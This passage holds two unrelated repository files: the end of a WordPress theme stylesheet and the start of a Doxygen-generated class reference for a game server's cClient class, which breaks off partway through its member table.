-webkit-border-radius: 15px; -moz-border-radius: 15px; border-radius: 15px; } .pager a:hover { text-decoration: none; background-color: #f5f5f5; } .pager .next a { float: right; } .pager .previous a { float: left; } .well, .sticky { min-height: 20px; padding: 19px; background-color: #f5f5f5; border: 1px solid #eee; border: 1px solid rgba(0, 0, 0, 0.05); -webkit-border-radius: 4px; -moz-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); -moz-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05); text-shadow: 1px 1px 0 #fff; } .well p:last-child { margin-bottom: 0; } .well img, .sticky img { background-color: #fff; } body { -webkit-transition: left 0.25s ease-in-out; -moz-transition: left 0.25s ease-in-out; -o-transition: left 0.25s ease-in-out; transition: left 0.25s ease-in-out; position: relative; left: 0; } body.basic { color: #444; font-family: PT Sans, sans-serif; } /* =Header -------------------------------------------------------------- */ #header-wrap { padding-top: 40px; } .home #header-wrap { height: 550px; } @media (max-width: 768px) { .home #header-wrap { height: 490px; } } @media (max-width: 768px) { #header-wrap { padding: 0; } } #header .left-header { margin: 0 0 60px; padding: 0 20px; } .basic #header .left-header { margin: 0; } @media (max-width: 768px) { #header .left-header { margin: 0 0 20px !important; } } #header .right-header { padding: 0 20px; } @media (max-width: 768px) { #header .right-header { margin: 0; } } #site-title, #site-logo { margin: 0; line-height: 1; } #site-logo { margin-bottom: 10px; display: block; } #site-title a { font-size: 72px; } @media (max-width: 768px) { #site-title a { font-size: 55px; } } .basic #site-title a { font-family: Lobster, cursive; } #site-title, #site-description { text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8); } #site-description { margin: 0; font-size: 14px; line-height: 1; } .basic #site-description { font-family: Quicksand, sans-serif; } #header-img { display: block; } /* =Main Navigation -------------------------------------------------------------- */ .navbar { margin-top: 25px; } @media (max-width: 768px) { .navbar { margin-top: 0; } } .navbar .nav > li.sub-menu-parent.open > a { background-color: #e5e5e5; color: #555; } .navbar-inner { float: right; margin-bottom: 60px; } @media (max-width: 768px) { .navbar-inner { padding: 0; -webkit-border-radius: 0; -moz-border-radius: 0; -ms-border-radius: 0; -o-border-radius: 0; border-radius: 0; } } .navbar-inverse .nav > li.sub-menu-parent.open > a { background-color: #111; color: #fff; } .nav { padding: 0; margin: 0 !important; } .nav li a:not(:last-child):after { content: "\f0d7"; font-family: FontAwesome; float: right; margin: 2px 0 0 10px; } .basic .nav li a:not(:last-child):after { content: "\f024"; } .nav li li a:not(:last-child):after { content: "\f0da"; margin: 2px 0 0 10px; } .basic .nav li li a:not(:last-child):after { content: "\f026"; } .sub-menu-parent { position: relative; } .sub-menu { -webkit-border-radius: 4px; -moz-border-radius: 4px; -ms-border-radius: 4px; -o-border-radius: 4px; border-radius: 4px; -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175); -moz-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175); box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175); position: absolute; top: 100%; left: 0; z-index: 1000; display: none; float: left; min-width: 160px; padding: 5px 0; margin: 2px 0 0; list-style: none; background-color: #ffffff; border: 1px solid #cccccc; border: 1px solid rgba(0, 0, 0, 0.15); background-clip: padding-box; } .open > .sub-menu { display: block; } .sub-menu > li > a { display: block; padding: 3px 20px; clear: both; font-weight: normal; line-height: 1.428571429; color: #333333; white-space: nowrap; } .nav > li > .sub-menu:before { content: ''; display: inline-block; border-left: 7px solid transparent; border-right: 7px solid transparent; border-bottom: 7px solid #ccc; border-bottom-color: rgba(0, 0, 0, 0.2); position: absolute; top: -7px; left: 9px; } .nav > li > .sub-menu:after { content: ''; display: inline-block; border-left: 6px solid transparent; border-right: 6px solid transparent; border-bottom: 6px solid #fff; position: absolute; top: -6px; left: 10px; } .sub-menu .sub-menu { -webkit-border-radius: 0 6px 6px 6px; -moz-border-radius: 0 6px 6px 6px; -ms-border-radius: 0 6px 6px 6px; -o-border-radius: 0 6px 6px 6px; border-radius: 0 6px 6px 6px; top: 0; left: 100%; margin-top: -6px; margin-left: -1px; } .sub-menu > li > a:hover, li.sub-menu-parent.open > a { text-decoration: none; color: #fff; background-color: #0081c2; } /* =Mobile Navigation -------------------------------------------------------------- */ #mobile-menu { background: #1b1b1b; display: none; padding: 5px 10px; border-bottom: 1px solid #000; margin: 0 -20px; } @media (max-width: 768px) { #mobile-menu { display: block; } } #mobile-menu a { -webkit-box-shadow: inset 1px 1px 1px black, 1px 1px 1px #333333; -moz-box-shadow: inset 1px 1px 1px black, 1px 1px 1px #333333; box-shadow: inset 1px 1px 1px black, 1px 1px 1px #333333; -webkit-border-radius: 8px; -moz-border-radius: 8px; -ms-border-radius: 8px; -o-border-radius: 8px; border-radius: 8px; width: 45px; margin: 0 0 0 5px; color: #fff; text-shadow: 1px 1px 1px #000; font-size: 20px; color: #ffffff; background: #000; text-align: center; padding: 5px 0; } #mobile-menu a.left-menu { margin: 0 5px 0 0; } #mobile-menu a:hover { background-color: #333; } .left-menu-open { position: relative; left: 260px; } #drop-down-search { -webkit-box-shadow: 0 2px 2px rgba(0, 0, 0, 0.4); -moz-box-shadow: 0 2px 2px rgba(0, 0, 0, 0.4); box-shadow: 0 2px 2px rgba(0, 0, 0, 0.4); display: none; padding: 14px; background: #333; margin: 0 -20px; position: absolute; width: 100%; z-index: 10; } #drop-down-search .search-field { width: 100%; } #drop-down-search .search-submit { display: none; } .offcanvas aside { padding: 0 10px; } .offcanvas .alert, .offcanvas .widget { margin: 30px 0 0; clear: both; float: left; } .offcanvas #site-navigation li, .offcanvas #site-navigation ul ul { width: 100%; } .offcanvas #site-navigation ul ul { -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; position: static; opacity: 1; margin: 0; border: 0; } .offcanvas #site-navigation ul ul li a { padding-left: 30px; } .offcanvas #site-navigation ul ul li a:after { border: 0; } .offcanvas #site-navigation ul ul ul li a { padding-left: 50px; } .offcanvas #site-navigation ul ul:before, .offcanvas #site-navigation ul ul:after { border: 0; } .offcanvas #site-navigation ul { padding: 0; } .offcanvas #site-navigation li a { background: #333; border-bottom: 1px solid #222; border-top: 1px solid #444; padding: 12px; color: #fff; display: block; font-size: 16px; text-transform: none; text-shadow: none; } .offcanvas #site-navigation li a:hover { background: #444; color: #fff; } .offcanvas #site-navigation li li a:not(:last-child):after { content: "\f0d7"; } .basic .offcanvas #site-navigation li li a:not(:last-child):after { content: "\f024"; } .offcanvas #site-navigation .navbar-inner { border: 0; } @media (max-width: 768px) { .left-sidebar #secondary, #left-nav { position: absolute; top: 0; left: -260px; width: 260px; padding: 0 0 30px; } } /* =Carousel -------------------------------------------------------------- */ #header-wrap #myCarousel { padding: 0; height: 323px; } @media (max-width: 768px) { #header-wrap #myCarousel { height: 284px; } } #header-wrap .carousel-caption { text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8); background: none; position: relative; top: auto; left: auto; bottom: auto; right: auto; padding: 0 20px; max-height: 245px; } @media (max-width: 768px) { #header-wrap .carousel-caption { max-height: 200px; } } #header-wrap .carousel-caption h1 { color: #fff; margin: 0 0 10px; font-size: 44px; } @media (max-width: 768px) { #header-wrap .carousel-caption h1 { font-size: 38px; } } @media (max-width: 480px) { #header-wrap .carousel-caption h1 { font-size: 28px; } } #header-wrap .carousel-caption h1 a { color: #fff; } #header-wrap .carousel-caption p { font-size: 24px; line-height: 1.3; margin: 0 0 20px; padding-right: 20%; } @media (max-width: 768px) { #header-wrap .carousel-caption .lead { font-size: 18px; padding-right: 0; } } @media (max-width: 480px) { #header-wrap .carousel-caption .lead { font-size: 16px; } } #header-wrap .carousel-control { top: auto; bottom: 15px; font-size: 24px; line-height: 1.5; } #header-wrap .carousel-control.left { left: 50%; margin-left: -50px; } #header-wrap .carousel-control.right { right: 50%; margin-right: -50px; } .jumbotron { margin-bottom: 30px; text-align: center; } .basic .jumbotron { text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8); -webkit-border-radius: 12px; -moz-border-radius: 12px; -ms-border-radius: 12px; -o-border-radius: 12px; border-radius: 12px; background: rgba(0, 0, 0, 0.2); padding-bottom: 30px; color: #fff; } @media (max-width: 768px) { .basic .jumbotron { background: none; padding: 0 20px; } } @media (max-width: 768px) { .jumbotron { margin: 0; } } .jumbotron h1 { font-size: 100px; line-height: 1; margin-top: 0; } .basic .jumbotron h1 { text-shadow: 1px 1px 1px rgba(0, 0, 0, 0.8); margin-top: 20px; color: #fff; } @media (max-width: 960px) { .jumbotron h1 { font-size: 80px; } } @media (max-width: 768px) { .jumbotron h1 { font-size: 70px; } .basic .jumbotron h1 { font-size: 44px; } } .jumbotron .lead { font-size: 24px; line-height: 1.25; } @media (max-width: 768px) { .jumbotron .lead { font-size: 20px; } } .jumbotron .btn { font-size: 21px; padding: 14px 24px; color: #fff; } .jumbotron .btn:hover { color: #fff; } /* =Home Widgets -------------------------------------------------------------- */ @media (max-width: 768px) { #home-page-widgets { margin: 0; } } .home-widget { margin: 20px 0; text-align: center; } @media (max-width: 768px) { .home-widget { margin-bottom: 10px !important; } } .home-widget img { margin-top: 0; } .home-widget-title { margin: 10px 0 5px; font-size: 28px; } /* =Main elements -------------------------------------------------------------- */ #main { margin-top: 40px; } #primary { margin-bottom: 40px; } #primary.centered { float: none !important; margin-left: auto; margin-right: auto; } /* =Article -------------------------------------------------------------- */ #featured { margin-bottom: 20px; } .blog-url { margin-bottom: 30px; } .basic .blog-url { color: #333; } article { margin-bottom: 30px; float: left; width: 100%; } .entry-title { font-size: 44px; margin: 0; } .basic .entry-title, .basic .entry-title a { font-family: Lato, sans-serif; } .entry-meta { font-size: 13px; line-height: 1; margin-top: 5px; color: #666; } .basic .entry-meta, .basic .entry-meta a { font-family: Lato, sans-serif; font-weight: 300; } .entry-meta a { color: #666; } .entry-meta a:hover { color: #444; } .post-category i, .post-format i { margin-right: 5px; opacity: 0.9; } .post-category, .post-format, .page-title { text-transform: uppercase; font-size: 14px; margin: 0; color: #666; margin-bottom: 3px; } .basic .post-category, .basic .post-category a, .basic .post-format, .basic .post-format a, .basic .page-title, .basic .page-title a { font-family: Lato, sans-serif; font-weight: 300; } .post-category a { color: #666; } .post-category a:hover { color: #444; } .entry-content { position: relative; width: 100%; } .more-link-p, footer.entry { clear: both; } .basic .more-link-p a.btn, .basic footer.entry a.btn { color: #fff; } .pullquote { -webkit-box-shadow: 0 1px 0 #eeeeee, inset 0 1px 0 #eeeeee; -moz-box-shadow: 0 1px 0 #eeeeee, inset 0 1px 0 #eeeeee; box-shadow: 0 1px 0 #eeeeee, inset 0 1px 0 #eeeeee; font-size: 21px; color: #444; font-weight: bold; line-height: 1.6125em; border: 0; padding: 0; margin: 1em 1.625em 1em 0; text-align: right; width: 33%; float: left; border-top: 1px solid #aaa; border-bottom: 1px solid #aaa; } .pullquote.alignright { margin: 1em 0 1em 1.625em; text-align: left; float: right; } @media (max-width: 480px) { .pullquote { width: 100%; margin: 0 0 .5em 0; float: none; text-align: left; } } @media (max-width: 480px) { .columns { -webkit-column-count: 1 !important; -moz-column-count: 1 !important; column-count: 1 !important; } } /* =404 -------------------------------------------------------------- */ #post-0 .entry-title { font-size: 500%; text-align: center; } @media (max-width: 480px) { #post-0 .entry-title { font-size: 400%; } } #post-0 .entry-content { text-align: center; font-size: 200%; line-height: 1.2; text-transform: uppercase; } @media (max-width: 480px) { #post-0 .entry-content { font-size: 150%; } } /* =Aside -------------------------------------------------------------- */ .format-aside p { margin-top: 0; } /* =Quote -------------------------------------------------------------- */ .format-quote .entry-content { padding-left: 70px; font-style: italic; } .format-quote blockquote, .format-quote blockquote p { font-size: 36px; line-height: 1.2; margin: 0; } .format-quote i.quote { color: #ccc; display: block; font-size: 60px; position: relative; float: left; } .format-quote blockquote { border: 0; padding: 0; font-size: 18px; } .format-quote cite { font-size: 24px; } /* =Status -------------------------------------------------------------- */ .format-status .post-category { margin-bottom: 10px; } .format-status .avatar { float: left; margin: 0 17px 0 0; } .format-status .author { font-size: 18px; margin: 0; } .format-status .entry-content { padding-left: 77px; clear: none; display: inherit; } .format-status .entry-content p { margin-top: 0; } .format-status time { font-size: 13px; color: #666; margin: 5px 0 10px; display: inline-block; } /* =Link -------------------------------------------------------------- */ .format-link blockquote { margin-top: 0; } .format-link p { margin: 0; } .format-link footer.entry p { margin: 1em 0; } .format-link .entry-content a { font-size: 24px; } /* =Gallery -------------------------------------------------------------- */ .gallery { margin: 20px -20px; } .gallery > p { margin: 0; height: 0; } .gallery-item { margin-bottom: 20px; float: left; padding: 0 20px; } .gallery-item .gallery-icon img { width: 100%; } .gallery-item .gallery-caption { padding: 10px 0; color: #444; clear: both; font-size: 12px; text-align: center; } .gallery-columns-1 .gallery-item { width: 100%; } .gallery-columns-2 .gallery-item { width: 50%; } .gallery-columns-3 .gallery-item { width: 33.33%; } .gallery-columns-4 .gallery-item { width: 25%; } .gallery-columns-5 .gallery-item { width: 20%; } .gallery-columns-6 .gallery-item { width: 16.66%; } .gallery-columns-7 .gallery-item { width: 14.28%; } .gallery-columns-8 .gallery-item { width: 12.5%; } .gallery-columns-9 .gallery-item { width: 11.11%; } @media (max-width: 480px) { .gallery .gallery-item { width: 100%; margin-bottom: 20px; } } /* =Tags -------------------------------------------------------------- */ .tags { font-size: 14px; margin-bottom: 0; } .tags span { margin-right: 5px; } .tags a { -webkit-border-radius: 4px; -moz-border-radius: 4px; -ms-border-radius: 4px; -o-border-radius: 4px; border-radius: 4px; background: #eee; padding: 2px 6px; border: 1px solid #ddd; font-size: 90%; margin: 0 2px 5px 0; color: #666; display: inline-block; } .tags a:hover { background: #ddd; } /* =Pagination -------------------------------------------------------------- */ #pagination, #posts-pagination, #post-pagination { margin: 0 0 20px 0; clear: both; } .btn.total-pages { margin-right: 10px; } .btn.special:hover, .btn.special:active { background-image: -webkit-gradient(linear, to bottom, to top, color-stop(0%, #ffffff), color-stop(100%, #e6e6e6)); background-image: -webkit-linear-gradient(to bottom, #ffffff, #e6e6e6); background-image: -moz-linear-gradient(to bottom, #ffffff, #e6e6e6); background-image: -o-linear-gradient(to bottom, #ffffff, #e6e6e6); background-image: linear-gradient(to bottom, #ffffff, #e6e6e6); -webkit-transition: none; -moz-transition: none; -o-transition: none; transition: none; -webkit-box-shadow: none; -moz-box-shadow: none; box-shadow: none; background-color: #F5F5F5; color: #333333; text-decoration: none; background-position: 0; } #posts-pagination { float: left; width: 100%; margin: 0 0 1em; line-height: 1.2; } #posts-pagination .previous, #posts-pagination .next { max-width: 48%; font-size: 16px; word-break: break-word; } #posts-pagination .previous a, #posts-pagination .next a { color: #000; } /* =Comments -------------------------------------------------------------- */ .comments-area { margin-top: 30px; clear: both; float: left; width: 100%; } .comments-area .commentlist, .comments-area .children { list-style: none; padding: 0; } .commentlist .comment, .commentlist .pingback { padding-bottom: 20px; } .commentlist .comment .avatar { float: left; } .commentlist .comment .comment-author, .commentlist .comment .comment-meta, .commentlist .comment .comment-text { padding-left: 75px; } .commentlist .comment .comment-author { font-size: 20px; } .commentlist .comment .comment-meta { font-size: 13px; color: #888; font-style: italic; } .commentlist .comment .comment-reply-link { -webkit-border-radius: 6px; -moz-border-radius: 6px; -ms-border-radius: 6px; -o-border-radius: 6px; border-radius: 6px; padding: 6px 12px; font-size: 14px; color: #fff; margin: 0; background: #bbb; } .commentlist .children { margin: 20px 0 0; padding-left: 10px; } .commentlist .children > .comment { padding-left: 23px !important; } .commentlist .children .comment { border-left: 1px solid #e6e6e6; position: relative; } .commentlist .children .comment:before { width: 12px; height: 12px; display: block; background: #fff; -webkit-border-radius: 12px; -moz-border-radius: 12px; -ms-border-radius: 12px; -o-border-radius: 12px; border-radius: 12px; border: 1px solid #e6e6e6; position: absolute; top: 30px; left: -6px; content: ""; z-index: 60; } .commentlist .children .comment:after { width: 100px; height: 1px; border-top: 1px solid #e6e6e6; display: block; position: absolute; top: 36px; left: -5px; content: ""; z-index: 50; } .commentlist .comment-body { padding: 20px; background: #f2f2f2; border: 1px solid #e6e6e6; display: block; z-index: 100; position: relative; } .commentlist .bypostauthor > .comment-body { border: 10px solid #ddd; } .commentlist pre { background: #fff; border-color: #e6e6e6; } #cancel-comment-reply-link { font-size: 14px; font-weight: normal; float: right; } /* =Archives -------------------------------------------------------------- */ #archive-header, .page-title { margin: 0 0 30px; border-top: 2px solid #aaa; border-bottom: 1px solid #aaa; } #archive-header h1 { margin-bottom: 0; border: 0; } #archive-header .archive-meta { color: #666; margin: 0; font-size: 14px; font-weight: normal; font-family: inherit; padding-bottom: 10px; } #archive-header .archive-meta p { margin: 0; } .page-title { font-size: 1.2em; padding: 10px 0; } .page-title a { font-family: inherit; } /* =Sidebar -------------------------------------------------------------- */ .widget, #secondary { margin-bottom: 30px; } .widget { width: 100%; font-size: 90%; } .widget .search-form { margin: 0 0 20px; } .widget .search-form .search-field { width: 100%; } .widget .search-form .search-submit { display: none; } .widget .tagcloud { padding: 0 0 20px; text-align: center; } .widget-title { font-size: 22px; margin: 0 0 10px; } .widget_rss ul { list-style: none; padding: 0; } .widget_rss ul li { padding-bottom: 15px; } .widget_rss ul li .rsswidget { font-size: 18px; line-height: 1.1; display: block; } .widget_rss ul li .rsswidget:hover { margin: 0 !important; } .widget_rss ul li .rssSummary { margin-top: 5px; } .widget_rss ul li .rss-date { font-size: 12px; color: #888; } .widget_rss ul li cite { font-style: italic; } /* =Footer Widgets -------------------------------------------------------------- */ .line.active { -webkit-box-shadow: 0 1px 0 white; -moz-box-shadow: 0 1px 0 white; box-shadow: 0 1px 0 white; border-bottom: 1px solid #ddd; width: 100%; display: block; margin-bottom: 20px; } .footer-widget { margin: 10px 0; } .footer-widget #calendar_wrap { color: #444; text-shadow: none; } .footer-widget #calendar_wrap caption { color: #fff; text-shadow: 1px 1px 0 #000; margin-bottom: 10px; } .footer-widget ul { list-style: none; padding: 5px 0 0; } .footer-widget ul li { margin-bottom: 5px; } .footer-widget .widget-title { -webkit-box-shadow: 0 1px 0 white; -moz-box-shadow: 0 1px 0 white; box-shadow: 0 1px 0 white; border-bottom: 1px solid #ddd; padding: 10px 0 15px; } /* =Footer -------------------------------------------------------------- */ #footer { border-top: 1px solid #e2e2e2; background: #eee; text-shadow: 1px 1px 0 #fff; color: #666; font-size: 13px; position: relative; z-index: 100; } #footer .row { margin-bottom: 0; } #footer #footer-content { padding: 10px 0 5px; } @media (max-width: 768px) { #footer #footer-content span { display: block; float: none; text-align: center; } } @media (max-width: 768px) { #footer #footer-content .icon-leaf { display: none; } } @media (max-width: 768px) { #footer #footer-content .copyright { margin-bottom: 10px; } } #footer .credit-link { position: relative; } #footer .icon-leaf { -webkit-transform: rotate(-5deg); -moz-transform: rotate(-5deg); -ms-transform: rotate(-5deg); -o-transform: rotate(-5deg); transform: rotate(-5deg); font-size: 28px; position: absolute; top: -4px; left: -35px; } /* =WordPress Core -------------------------------------------------------------- */ .alignnone { margin: 5px 20px 20px 0; } .aligncenter, div.aligncenter { display: block; margin: 5px auto 20px auto; } .alignright { float: right; margin: 5px 0 20px 20px; } .alignleft { float: left; margin: 5px 20px 20px 0; } .aligncenter { display: block; margin: 5px auto 20px auto; } a img.alignright { float: right; margin: 5px 0 20px 20px; } a img.alignnone { margin: 5px 20px 20px 0; } a img.alignleft { float: left; margin: 5px 20px 20px 0; } a img.aligncenter { display: block; margin-left: auto; margin-right: auto; } .wp-caption { background: #f2f2f2; border: 1px solid #e6e6e6; max-width: 100%; padding: 10px; text-align: center; } .wp-caption.alignnone { margin: 5px 20px 20px 0; } .wp-caption.alignleft { margin: 5px 20px 20px 0; } .wp-caption.alignright { margin: 5px 0 20px 20px; } .wp-caption img { border: 0 none; height: auto; margin: 0; max-width: 100%; padding: 0; width: auto; } .wp-caption p.wp-caption-text { font-size: 12px; margin: 0; padding: 5px; }
Documentation/html/classc_client.html
drudgedance/UAS2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <title>UAS2: cClient Class Reference</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <link href="doxygen.css" rel="stylesheet" type="text/css"/> </head> <body> <!-- Generated by Doxygen 1.6.2 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="main.html"><span>Main&nbsp;Page</span></a></li> <li class="current"><a href="annotated.html"><span>Classes</span></a></li> <li><a href="files.html"><span>Files</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="annotated.html"><span>Class&nbsp;List</span></a></li> <li><a href="hierarchy.html"><span>Class&nbsp;Hierarchy</span></a></li> <li><a href="functions.html"><span>Class&nbsp;Members</span></a></li> </ul> </div> </div> <div class="contents"> <h1>cClient Class Reference</h1><!-- doxytag: class="cClient" --> <p><a href="classc_client-members.html">List of all members.</a></p> <table border="0" cellpadding="0" cellspacing="0"> <tr><td colspan="2"><h2>Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8725e9ab3e81a072891e5bcc4465dbda"></a><!-- doxytag: member="cClient::cClient" ref="a8725e9ab3e81a072891e5bcc4465dbda" args="(SOCKADDR_IN &amp;saSockAddr, BOOL fAddToHash=TRUE)" --> &nbsp;</td><td class="memItemRight" valign="bottom"><b>cClient</b> (SOCKADDR_IN &amp;saSockAddr, BOOL fAddToHash=TRUE)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ae84e237ef196c54287a098d1e1e3a459"></a><!-- doxytag: member="cClient::AddPacket" ref="ae84e237ef196c54287a098d1e1e3a459" args="(SERVER eServer, BYTE *pbData, WORD wSize, WORD wGroup)" --> void&nbsp;</td><td class="memItemRight" valign="bottom"><b>AddPacket</b> (SERVER eServer, BYTE *pbData, WORD wSize, WORD wGroup)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a03672950f2bee8637fa6ccb13c2ff30c"></a><!-- doxytag: member="cClient::AddPacket" ref="a03672950f2bee8637fa6ccb13c2ff30c" args="(SERVER eServer, cMessage &amp;cmPacket, WORD wGroup)" --> void&nbsp;</td><td class="memItemRight" valign="bottom"><b>AddPacket</b> (SERVER eServer, <a class="el" href="classc_message.html">cMessage</a> &amp;cmPacket, WORD wGroup)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a3a2a08725d4bb1652e1ae03c965123e5"></a><!-- doxytag: member="cClient::SendQueuedPackets" ref="a3a2a08725d4bb1652e1ae03c965123e5" args="()" --> void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendQueuedPackets</b> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#af8cfc53e46270debb3a903643c3a6d59">ProcessPacket_CS</a> (<a class="el" href="classc_recv_packet.html">cRecvPacket</a> *pcRecvPacket)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a90c94eb1a59cf65ff87de321a687347a">ProcessPacket_WS</a> (<a class="el" href="classc_recv_packet.html">cRecvPacket</a> *pcRecvPacket)</td></tr> <tr><td colspan="2"><h2>Static Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8ca7d1ddb7b61cb5841b109c7cd1fa82"></a><!-- doxytag: member="cClient::Hash_Load" ref="a8ca7d1ddb7b61cb5841b109c7cd1fa82" args="()" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>Hash_Load</b> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac81f22303e3efa2150fa4cf0e2db03fa"></a><!-- doxytag: member="cClient::Hash_New" ref="ac81f22303e3efa2150fa4cf0e2db03fa" args="(SOCKADDR_IN &amp;saSockAddr)" --> static <a class="el" href="classc_client.html">cClient</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><b>Hash_New</b> (SOCKADDR_IN &amp;saSockAddr)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a62aa722cb32b806fdcc823356254b4d7">Hash_Erase</a> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static void&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#af6f48be3b5024ce9b346fcd93079aea9">Hash_Remove</a> (<a class="el" href="classc_client.html">cClient</a> *pcClient)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="classc_client.html">cClient</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#aed2ee9f88a8c9c8b9e48d54d833d2f27">FindClient</a> (DWORD dwGUID)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="classc_client.html">cClient</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#af8556c7252fc308de7109f1e49342281">FindClient</a> (char *szName)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="classc_avatar.html">cAvatar</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a622b0587d13187373ee48b6e5a115822">FindAvatar</a> (DWORD dwGUID)</td></tr> <tr><td class="memItemLeft" align="right" valign="top">static <a class="el" href="classc_avatar.html">cAvatar</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#a06daa279d4743c118a1500c854cf211d">FindAvatar</a> (char *szName)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ad6fad75b6f5bf192a62c548d8a08e4bf"></a><!-- doxytag: member="cClient::SendOffAllPackets" ref="ad6fad75b6f5bf192a62c548d8a08e4bf" args="()" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendOffAllPackets</b> ()</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa0046d8918d7f157b5547aacd2924af3"></a><!-- doxytag: member="cClient::SendToAllClients" ref="aa0046d8918d7f157b5547aacd2924af3" args="(cMessage &amp;cmData, WORD wGroup)" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendToAllClients</b> (<a class="el" href="classc_message.html">cMessage</a> &amp;cmData, WORD wGroup)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa6b60f25488ca72d33ecb5df977fbcb4"></a><!-- doxytag: member="cClient::SendToAllClients" ref="aa6b60f25488ca72d33ecb5df977fbcb4" args="(BYTE *pbData, WORD wSize, WORD wGroup)" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendToAllClients</b> (BYTE *pbData, WORD wSize, WORD wGroup)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac2f976c350f24943489cd7ccd0c50b9d"></a><!-- doxytag: member="cClient::SendToAllOtherClients" ref="ac2f976c350f24943489cd7ccd0c50b9d" args="(cClient *pcClientOrg, BYTE *pbData, WORD wSize, WORD wGroup)" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendToAllOtherClients</b> (<a class="el" href="classc_client.html">cClient</a> *pcClientOrg, BYTE *pbData, WORD wSize, WORD wGroup)</td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a12c8002df4164b07e8aeb9dbecdee3fb"></a><!-- doxytag: member="cClient::SendToAllOtherClients" ref="a12c8002df4164b07e8aeb9dbecdee3fb" args="(cClient *pcClientOrg, cMessage &amp;cmData, WORD wGroup)" --> static void&nbsp;</td><td class="memItemRight" valign="bottom"><b>SendToAllOtherClients</b> (<a class="el" href="classc_client.html">cClient</a> *pcClientOrg, <a class="el" href="classc_message.html">cMessage</a> &amp;cmData, WORD wGroup)</td></tr> <tr><td colspan="2"><h2>Public Attributes</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a26e7b5bf26d0a8d560d91daae8087776"></a><!-- doxytag: member="cClient::m_saSockAddr" ref="a26e7b5bf26d0a8d560d91daae8087776" args="" --> SOCKADDR_IN&nbsp;</td><td class="memItemRight" valign="bottom"><b>m_saSockAddr</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aebf85bc3a7926a601a532e8172e85c49"></a><!-- doxytag: member="cClient::m_pcNext" ref="aebf85bc3a7926a601a532e8172e85c49" args="" --> <a class="el" href="classc_client.html">cClient</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><b>m_pcNext</b></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a5bc74e1e6f8a40bd49f1f346a8f421a8"></a><!-- doxytag: member="cClient::m_pcPrev" ref="a5bc74e1e6f8a40bd49f1f346a8f421a8" args="" --> <a class="el" href="classc_client.html">cClient</a> *&nbsp;</td><td class="memItemRight" valign="bottom"><b>m_pcPrev</b></td></tr> <tr><td colspan="2"><h2>Friends</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af9cf39fc065c0c9c6040c8d5849cbdce"></a><!-- doxytag: member="cClient::cMasterServer" ref="af9cf39fc065c0c9c6040c8d5849cbdce" args="" --> class&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classc_client.html#af9cf39fc065c0c9c6040c8d5849cbdce">cMasterServer</a></td></tr> <tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a487f7158d3f8ae977b4d039ac42828b2"></a><!-- doxytag: member="cClient::cWorldManager" ref="a487f7158d3f8ae977b4d039ac42828b2" args="" --> class&nbsp;</td><td 